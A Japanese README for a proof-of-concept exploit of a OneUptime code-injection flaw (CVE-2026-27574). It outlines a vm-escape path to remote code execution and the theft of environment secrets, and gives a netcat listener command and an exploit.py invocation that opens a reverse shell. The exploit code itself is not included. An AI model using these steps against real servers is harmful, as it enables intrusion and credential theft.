
CVE-2026-27574の概念実証エクスプロイト。OneUptimeにおける重大なコードインジェクションであり、リモートコード実行と環境変数の漏洩を可能にします。
エクスプロイト種別: リモート
認証: 低権限(登録済みのプロジェクトメンバーであれば誰でも)
影響: サーバー完全侵害、認証情報の窃取、クラスター乗っ取り
flowchart TD
A[開始] --> B[登録を開く]
B --> C[新しいアカウントを登録]
C --> D[新しいプロジェクトを作成]
D --> E[ProjectMember ロールを取得]
E --> F[カスタム JavaScript モニターを作成]
F --> G[悪意のある vm エスケープペイロードを注入]
G --> H[プローブが約60秒ごとにコードを実行]
H --> I[コンストラクタチェーン経由で vm コンテキストをエスケープ]
I --> J[process と child_process にアクセス]
J --> K[システムコマンドを実行]
J --> L[環境変数を漏洩]
K --> M[/etc/passwd、id、hostname などを読み取る]
L --> N[ONEUPTIME_SECRET、DB/Redis パスワードなどを抽出]
M --> O[完全な RCE を達成]
N --> O
O --> P[任意: リバースシェル / データ流出]
P --> Q[終了 - システム侵害]
# リスナーを起動(リバースシェルを使用する場合)
nc -lvnp 4444
# エクスプロイトを実行
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444
requests ライブラリ(pip install requests)このコードは教育目的および許可されたセキュリティテスト専用に提供されています。
所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は、違法かつ非倫理的です。
Mohammed Idrees Banyamer によって開発 • ヨルダン • @banyamer_security